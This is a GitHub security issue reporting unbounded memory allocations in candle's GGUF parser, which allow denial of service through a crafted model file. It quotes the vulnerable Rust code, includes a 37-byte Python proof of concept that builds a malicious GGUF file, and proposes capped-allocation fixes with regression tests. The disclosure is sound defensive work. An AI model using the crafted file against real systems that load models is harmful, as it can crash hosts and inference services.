Unguarded allocation sites in candle-core/src/quantized/gguf_file.rs (DoS via crafted GGUF)

Filing this publicly because the repo does not currently have Private Vulnerability Reporting enabled. Happy to move to a private channel if preferred — please enable PVR on the repo and let me know.

### Summary

`candle-core/src/quantized/gguf_file.rs` (current `main`, commit `24b0b28`+) reads several length / count fields from a GGUF file as `u32`/`u64` and uses them directly as the size argument of `vec![T; n]`, `Vec::with_capacity(n)`, and `for _ in 0..n` loops with no upper-bound check. A small (< 64-byte) GGUF file that declares `2^32` items drives the loader into multi-GB allocation or extremely long iteration, killing the host or its inference workload.

Same bug class as CVE-2025-66960 (ollama `fs/ggml/gguf.go`, fixed). In candle, the same pattern recurs across five sites. The sibling crate `safetensors` in the same org explicitly caps with `MAX_HEADER_SIZE` + `buffer.get` slicing — candle's GGUF loader did not adopt that pattern.

### Affected sites

All in `candle-core/src/quantized/gguf_file.rs`:

**(a) L99 — `read_string` length buffer:**

```rust
let len = match magic {
    VersionedMagic::GgufV1 => reader.read_u32::<LittleEndian>()? as usize,
    VersionedMagic::GgufV2 | VersionedMagic::GgufV3 => {
        reader.read_u64::<LittleEndian>()? as usize
    }
};
let mut v = vec![0u8; len];        // <-- immediate physical alloc of `len` bytes
reader.read_exact(&mut v)?;
```

`vec![0u8; len]` is a committed allocation, not a virtual reservation. `len = 2^32 → 4 GB RSS immediately`.

**(b) L306 — `Value::read` ARRAY branch:**

```rust
let len = match magic { ... };
let mut vs = Vec::with_capacity(len);
for _ in 0..len {
    vs.push(Value::read(reader, value_type, magic)?)
}
```

**(c) L421 — `tensor_count` outer loop:**

```rust
let tensor_count = ... reader.read_u64::<LittleEndian>()? as usize;
for _idx in 0..tensor_count {
    let tensor_name = read_string(reader, &magic)?;
    ...
}
```

**(d) L413 — `metadata_kv_count`:** Same shape as (c).

**(e) L427 / L432 — tensor dimensions vector:**

```rust
let n_dimensions = reader.read_u32::<LittleEndian>()?;
let mut dimensions = vec![0; n_dimensions as usize];    // <-- alloc
reader.read_u32_into::<LittleEndian>(&mut dimensions)?;
```

`Vec<usize>` so 8 bytes/element. `n_dimensions = 2^32 − 1 → ~32 GB` immediate alloc.

### Reachability

`gguf_file::Content::read` is the canonical entry for loading any GGUF model. Any application that loads a user-supplied or hub-downloaded GGUF traverses these sites.

### Minimal PoC — 37 bytes

```python
import struct
malicious = (
    b'GGUF'
    + struct.pack('<I', 3)
    + struct.pack('<Q', 1)               # tensor_count = 1
    + struct.pack('<Q', 0)               # kv_count = 0
    + struct.pack('<Q', 1) + b't'        # name = 't'
    + struct.pack('<I', 0xFFFFFFFF)      # n_dimensions = 2^32 - 1
)
open('/tmp/evil.gguf', 'wb').write(malicious)
```

```rust
use candle_core::quantized::gguf_file;
use std::fs::File;
let mut f = File::open("/tmp/evil.gguf").unwrap();
let _ = gguf_file::Content::read(&mut f);
// attempts vec![0; (2^32-1)] (Vec<usize>) = ~32 GB
```

### Suggested fix

Mirror the `safetensors` pattern. Define caps and gate each allocation:

```rust
const GGUF_MAX_ARRAY_ELEMENTS: usize = 1 << 30;
const GGUF_MAX_STRING_LENGTH:  usize = 1 << 26;
const GGUF_MAX_TENSOR_DIMS:    usize = 8;

fn read_string<R: Read>(reader: &mut R, magic: &VersionedMagic) -> Result<String> {
    let len = ...;
    if len > GGUF_MAX_STRING_LENGTH {
        crate::bail!("GGUF string length {len} exceeds max {GGUF_MAX_STRING_LENGTH}")
    }
    let mut v = vec![0u8; len];
    reader.read_exact(&mut v)?;
    ...
}
```

Equivalent gates at L306, L413, L421, L427. The C++ baseline `ggml/src/gguf.cpp` enforces the same caps after PR ggml-org/llama.cpp#19856.

Regression tests should cover each site with an oversized value and assert that the parser returns `Err` (not OOM).

### CWE

- CWE-770 (Allocation of Resources Without Limits or Throttling)
- CWE-1284 (Improper Validation of Specified Quantity in Input)
- CWE-400 (Uncontrolled Resource Consumption)

### CVE

If a CVE assignment is in scope here, happy to coordinate.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Unguarded allocation sites in candle-core/src/quantized/gguf_file.rs (DoS via crafted GGUF) #3533

Summary

Affected sites

Reachability

Minimal PoC — 37 bytes

Suggested fix

CWE

CVE

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Unguarded allocation sites in candle-core/src/quantized/gguf_file.rs (DoS via crafted GGUF) #3533

Description

Summary

Affected sites

Reachability

Minimal PoC — 37 bytes

Suggested fix

CWE

CVE

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions